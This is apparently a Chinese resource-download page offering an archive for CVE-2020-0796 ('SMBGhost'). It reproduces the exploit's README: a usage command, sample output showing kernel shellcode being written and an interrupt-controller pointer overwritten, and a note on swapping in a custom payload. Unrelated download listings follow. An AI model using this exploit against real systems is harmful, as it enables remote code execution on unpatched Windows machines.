首页

星云

工具

资源

星选

资讯

热门工具

自选颜色:

PDF转图片完全免费

小红书视频下载无水印

抖音视频下载无水印

数字星空

永恒之黑使用的资源包SMB

安全技术

19.2KB

7 需要积分: 1

立即下载

资源介绍:

永恒之黑使用的资源包SMB

# SMBGhost_RCE_PoC RCE PoC for CVE-2020-0796 "SMBGhost" For demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die. Now that that's out of the way.... Usage ex: ``` $SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131 [+] found low stub at phys addr 13000! [+] PML4 at 1ad000 [+] base of HAL heap at fffff79480000000 [+] ntoskrnl entry at fffff80645792010 [+] found PML4 self-ref entry 1eb [+] found HalpInterruptController at fffff79480001478 [+] found HalpApicRequestInterrupt at fffff80645cb3bb0 [+] built shellcode! [+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 [+] KUSER_SHARED_DATA PTE NX bit cleared! [+] Wrote shellcode at fffff78000000a00! [+] Press a key to execute shellcode! [+] overwrote HalpInterruptController pointer, should have execution shortly... ``` Replace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself. lznt1 code from [here](https://github.com/you0708/lznt1). Modified to add a "bad compression" function to corrupt SRVNET buffer header without causing a crash. See this excellent write up by Ricera Security for more details on the methods I used: https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html

资源文件列表:

SMBGhost_RCE_PoC-master (2).zip 大约有9个文件

.gitignore 1.76KB
__pycache__/
__pycache__/lznt1.cpython-312.pyc 5.5KB
__pycache__/smb_win.cpython-312.pyc 9.72KB
exploit.py 19.2KB
kernel_shellcode.asm 8.03KB
lznt1.py 4.51KB
README.md 1.5KB
smb_win.py 5.47KB

0评论

提交

加载更多评论

其他资源

Navicat Premium 12

Navicat Premium 是一款功能强大的多连接数据库管理开发工具。功能特点多数据库支持：可让用户通过单一程序同时连接到 MySQL、MariaDB、MongoDB、SQL Server、Oracle、PostgreSQL、SQLite 等多种常见数据库，无需为不同数据库系统安装不同工具，方便管理不同类型的数据库，提高工作效率. 连接与操作：能够快速连接到本地或远程数据库服务器，支持多种连接方式，用户可以轻松地进行数据查询、修改、删除等常规操作，还支持直接在表格中编辑数据，方便地增删改查. 数据同步与传输：支持在不同数据库之间传输数据、结构或两者兼具，可比较和同步两个数据库之间的数据和结构，确保数据的一致性和完整性，简化了从一台服务器迁移数据到另一台服务器的流程，方便用户在不同数据库环境中进行数据迁移和整合工作. 批量处理与排程：用户可以设置不同数据库的批次处理任务，并指定在特定时间执行，如定时备份、数据同步、导入导出等操作，提高工作的自动化程度和效率. 导入 / 导出：提供了方便易用的导入 / 导出向导，支持多种数据格式，如 CSV、XML、JSON、Excel 等

Navicat Premium 12

Navicat Premium 12

Navicat Premium 12

karabiner-vim-mode-plus-master.zip

karabiner-vim-mode-plus-master.zip

FREERTOS系统在STM32F103C8T6上运行的模板

FREERTOS系统在STM32F103C8T6上运行的摸板. FREERTOS V10.3.1 运行正常.

百科融创主车代码，嵌入式应用开发赛项

主车代码视频如链接：https://www.bilibili.com/video/BV12LzSYWEEK/ 包含，基础运动，标志物通讯与控制，运动读卡，测距，车库，灯光档位判断，显示，转向灯操作，超时处理，常用算法等等功能，增加全自动坐标跑图，pwm寻迹，优化原有功能代码

j-link纯驱动，不带各种周边

从系统里边提出来的，适用于win8-win10-win11，用第三方工具，不用SEGGER工具的可以用这个，总体积131k

蚕茧缺陷检测数据集VOC+YOLO格式523张4类别.zip

样本图：blog.csdn.net/2403_88102872/article/details/144228831 文件放服务器下载，请务必到电脑端资源详情查看然后下载数据集格式：Pascal VOC格式+YOLO格式(不包含分割路径的txt文件，仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数)：523 标注数量(xml文件个数)：523 标注数量(txt文件个数)：523 标注类别数：4 标注类别名称:["fugongiya","normal","sunken","surface defect"] 每个类别标注的框数： fugongiya 框数 = 1297 normal 框数 = 1825 sunken 框数 = 2110 surface defect 框数 = 4042 总框数：9274 使用标注工具：labelImg 标注规则：对类别进行画矩形框重要说明：暂无特别声明：本数据集不对训练的模型或者权重文件精度作任何保证，数据集只提供准确且合理标注

forest+fires.zip

forest+fires.zip

Pro.20241203_继承 (1).zip

Pro.20241203_继承 (1).zip